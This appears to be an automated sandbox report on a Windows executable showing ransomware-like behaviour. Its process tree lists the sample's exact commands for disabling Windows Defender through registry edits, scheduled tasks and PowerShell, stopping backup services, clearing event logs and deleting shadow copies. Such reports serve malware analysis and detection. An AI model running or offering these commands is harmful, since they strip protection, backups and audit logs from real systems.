Analysis
-
max time kernel
138s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
20-03-2024 23:12
Behavioral task
behavioral1
Sample
da13022097518d123a91a3958be326da.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
da13022097518d123a91a3958be326da.exe
Resource
win10v2004-20240226-en
General
-
Target
da13022097518d123a91a3958be326da.exe
-
Size
884KB
-
MD5
da13022097518d123a91a3958be326da
-
SHA1
24a71ab462594d5a159bbf176588af951aba1381
-
SHA256
25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
-
SHA512
a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
-
SSDEEP
12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 1028 wevtutil.exe 2056 wevtutil.exe 4680 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
resource yara_rule behavioral2/memory/3904-0-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-1-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-2-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-3-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-4-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-5-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-8-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-9-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-10-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-13-0x0000000000E70000-0x0000000001182000-memory.dmp upx behavioral2/memory/3904-67-0x0000000000E70000-0x0000000001182000-memory.dmp upx -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1976 sc.exe 1516 sc.exe 4232 sc.exe 3672 sc.exe 1760 sc.exe 3288 sc.exe 1912 sc.exe 4804 sc.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2040 powershell.exe 2040 powershell.exe 2040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 2056 wevtutil.exe Token: SeBackupPrivilege 2056 wevtutil.exe Token: SeSecurityPrivilege 4680 wevtutil.exe Token: SeBackupPrivilege 4680 wevtutil.exe Token: SeSecurityPrivilege 1028 wevtutil.exe Token: SeBackupPrivilege 1028 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1216 wmic.exe Token: SeSecurityPrivilege 1216 wmic.exe Token: SeTakeOwnershipPrivilege 1216 wmic.exe Token: SeLoadDriverPrivilege 1216 wmic.exe Token: SeSystemProfilePrivilege 1216 wmic.exe Token: SeSystemtimePrivilege 1216 wmic.exe Token: SeProfSingleProcessPrivilege 1216 wmic.exe Token: SeIncBasePriorityPrivilege 1216 wmic.exe Token: SeCreatePagefilePrivilege 1216 wmic.exe Token: SeBackupPrivilege 1216 wmic.exe Token: SeRestorePrivilege 1216 wmic.exe Token: SeShutdownPrivilege 1216 wmic.exe Token: SeDebugPrivilege 1216 wmic.exe Token: SeSystemEnvironmentPrivilege 1216 wmic.exe Token: SeRemoteShutdownPrivilege 1216 wmic.exe Token: SeUndockPrivilege 1216 wmic.exe Token: SeManageVolumePrivilege 1216 wmic.exe Token: 33 1216 wmic.exe Token: 34 1216 wmic.exe Token: 35 1216 wmic.exe Token: 36 1216 wmic.exe Token: SeIncreaseQuotaPrivilege 1224 wmic.exe Token: SeSecurityPrivilege 1224 wmic.exe Token: SeTakeOwnershipPrivilege 1224 wmic.exe Token: SeLoadDriverPrivilege 1224 wmic.exe Token: SeSystemProfilePrivilege 1224 wmic.exe Token: SeSystemtimePrivilege 1224 wmic.exe Token: SeProfSingleProcessPrivilege 1224 wmic.exe Token: SeIncBasePriorityPrivilege 1224 wmic.exe Token: SeCreatePagefilePrivilege 1224 wmic.exe Token: SeBackupPrivilege 1224 wmic.exe Token: SeRestorePrivilege 1224 wmic.exe Token: SeShutdownPrivilege 1224 wmic.exe Token: SeDebugPrivilege 1224 wmic.exe Token: SeSystemEnvironmentPrivilege 1224 wmic.exe Token: SeRemoteShutdownPrivilege 1224 wmic.exe Token: SeUndockPrivilege 1224 wmic.exe Token: SeManageVolumePrivilege 1224 wmic.exe Token: 33 1224 wmic.exe Token: 34 1224 wmic.exe Token: 35 1224 wmic.exe Token: 36 1224 wmic.exe Token: SeIncreaseQuotaPrivilege 1224 wmic.exe Token: SeSecurityPrivilege 1224 wmic.exe Token: SeTakeOwnershipPrivilege 1224 wmic.exe Token: SeLoadDriverPrivilege 1224 wmic.exe Token: SeSystemProfilePrivilege 1224 wmic.exe Token: SeSystemtimePrivilege 1224 wmic.exe Token: SeProfSingleProcessPrivilege 1224 wmic.exe Token: SeIncBasePriorityPrivilege 1224 wmic.exe Token: SeCreatePagefilePrivilege 1224 wmic.exe Token: SeBackupPrivilege 1224 wmic.exe Token: SeRestorePrivilege 1224 wmic.exe Token: SeShutdownPrivilege 1224 wmic.exe Token: SeDebugPrivilege 1224 wmic.exe Token: SeSystemEnvironmentPrivilege 1224 wmic.exe Token: SeRemoteShutdownPrivilege 1224 wmic.exe Token: SeUndockPrivilege 1224 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3904 wrote to memory of 1740 3904 da13022097518d123a91a3958be326da.exe 103 PID 3904 wrote to memory of 1740 3904 da13022097518d123a91a3958be326da.exe 103 PID 3904 wrote to memory of 1740 3904 da13022097518d123a91a3958be326da.exe 103 PID 1740 wrote to memory of 1392 1740 net.exe 105 PID 1740 wrote to memory of 1392 1740 net.exe 105 PID 1740 wrote to memory of 1392 1740 net.exe 105 PID 3904 wrote to memory of 860 3904 da13022097518d123a91a3958be326da.exe 106 PID 3904 wrote to memory of 860 3904 da13022097518d123a91a3958be326da.exe 106 PID 3904 wrote to memory of 860 3904 da13022097518d123a91a3958be326da.exe 106 PID 860 wrote to memory of 232 860 net.exe 108 PID 860 wrote to memory of 232 860 net.exe 108 PID 860 wrote to memory of 232 860 net.exe 108 PID 3904 wrote to memory of 4176 3904 da13022097518d123a91a3958be326da.exe 109 PID 3904 wrote to memory of 4176 3904 da13022097518d123a91a3958be326da.exe 109 PID 3904 wrote to memory of 4176 3904 da13022097518d123a91a3958be326da.exe 109 PID 4176 wrote to memory of 524 4176 net.exe 111 PID 4176 wrote to memory of 524 4176 net.exe 111 PID 4176 wrote to memory of 524 4176 net.exe 111 PID 3904 wrote to memory of 4600 3904 da13022097518d123a91a3958be326da.exe 112 PID 3904 wrote to memory of 4600 3904 da13022097518d123a91a3958be326da.exe 112 PID 3904 wrote to memory of 4600 3904 da13022097518d123a91a3958be326da.exe 112 PID 4600 wrote to memory of 4320 4600 net.exe 114 PID 4600 wrote to memory of 4320 4600 net.exe 114 PID 4600 wrote to memory of 4320 4600 net.exe 114 PID 3904 wrote to memory of 1580 3904 da13022097518d123a91a3958be326da.exe 115 PID 3904 wrote to memory of 1580 3904 da13022097518d123a91a3958be326da.exe 115 PID 3904 wrote to memory of 1580 3904 da13022097518d123a91a3958be326da.exe 115 PID 1580 wrote to memory of 3544 1580 net.exe 117 PID 1580 wrote to memory of 3544 1580 net.exe 117 PID 1580 wrote to memory of 3544 1580 net.exe 117 PID 3904 wrote to memory of 5064 3904 da13022097518d123a91a3958be326da.exe 118 PID 3904 wrote to memory of 5064 3904 da13022097518d123a91a3958be326da.exe 118 PID 3904 wrote to memory of 5064 3904 da13022097518d123a91a3958be326da.exe 118 PID 5064 wrote to memory of 4912 5064 net.exe 120 PID 5064 wrote to memory of 4912 5064 net.exe 120 PID 5064 wrote to memory of 4912 5064 net.exe 120 PID 3904 wrote to memory of 2888 3904 da13022097518d123a91a3958be326da.exe 121 PID 3904 wrote to memory of 2888 3904 da13022097518d123a91a3958be326da.exe 121 PID 3904 wrote to memory of 2888 3904 da13022097518d123a91a3958be326da.exe 121 PID 2888 wrote to memory of 2040 2888 net.exe 123 PID 2888 wrote to memory of 2040 2888 net.exe 123 PID 2888 wrote to memory of 2040 2888 net.exe 123 PID 3904 wrote to memory of 4592 3904 da13022097518d123a91a3958be326da.exe 124 PID 3904 wrote to memory of 4592 3904 da13022097518d123a91a3958be326da.exe 124 PID 3904 wrote to memory of 4592 3904 da13022097518d123a91a3958be326da.exe 124 PID 4592 wrote to memory of 2116 4592 net.exe 126 PID 4592 wrote to memory of 2116 4592 net.exe 126 PID 4592 wrote to memory of 2116 4592 net.exe 126 PID 3904 wrote to memory of 4804 3904 da13022097518d123a91a3958be326da.exe 127 PID 3904 wrote to memory of 4804 3904 da13022097518d123a91a3958be326da.exe 127 PID 3904 wrote to memory of 4804 3904 da13022097518d123a91a3958be326da.exe 127 PID 3904 wrote to memory of 1976 3904 da13022097518d123a91a3958be326da.exe 129 PID 3904 wrote to memory of 1976 3904 da13022097518d123a91a3958be326da.exe 129 PID 3904 wrote to memory of 1976 3904 da13022097518d123a91a3958be326da.exe 129 PID 3904 wrote to memory of 1516 3904 da13022097518d123a91a3958be326da.exe 131 PID 3904 wrote to memory of 1516 3904 da13022097518d123a91a3958be326da.exe 131 PID 3904 wrote to memory of 1516 3904 da13022097518d123a91a3958be326da.exe 131 PID 3904 wrote to memory of 4232 3904 da13022097518d123a91a3958be326da.exe 133 PID 3904 wrote to memory of 4232 3904 da13022097518d123a91a3958be326da.exe 133 PID 3904 wrote to memory of 4232 3904 da13022097518d123a91a3958be326da.exe 133 PID 3904 wrote to memory of 3672 3904 da13022097518d123a91a3958be326da.exe 135 PID 3904 wrote to memory of 3672 3904 da13022097518d123a91a3958be326da.exe 135 PID 3904 wrote to memory of 3672 3904 da13022097518d123a91a3958be326da.exe 135 PID 3904 wrote to memory of 1760 3904 da13022097518d123a91a3958be326da.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\da13022097518d123a91a3958be326da.exe"C:\Users\Admin\AppData\Local\Temp\da13022097518d123a91a3958be326da.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1392
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:232
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:524
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4320
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3544
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:4912
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2040
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_1dc94" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1dc94" /y3⤵PID:2116
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:4804
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:1516
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:4232
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:3672
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1760
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:3288
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_1dc94" start= disabled2⤵
- Launches sc.exe
PID:1912
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1636
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:4840
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3924
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3408
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3892
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2228
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3256
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2572
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:324
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2520
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3264
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3600
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:4020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:4772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:4308
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:4320
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3564
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1020
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1856
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4724
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2440
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:972
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2436
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3248
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:884
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵PID:1600
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4004 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:4304
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD578b2e38215fb307930d45d04b19da219
SHA153da7024a9da9604600f4695e5d00c1254bb3a22
SHA2566aa0a1eef50fef64c88b4878e9552724180779b6f1361d03f27ab03a51326613
SHA512e0b61fd83aa686fd6f5146b9b593b546cbec5c4064a337bd89dc8238b809f04de75b4951baef7248e143bcf022a41b9c4f1910eaa0548618c9dab97224cc2995
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82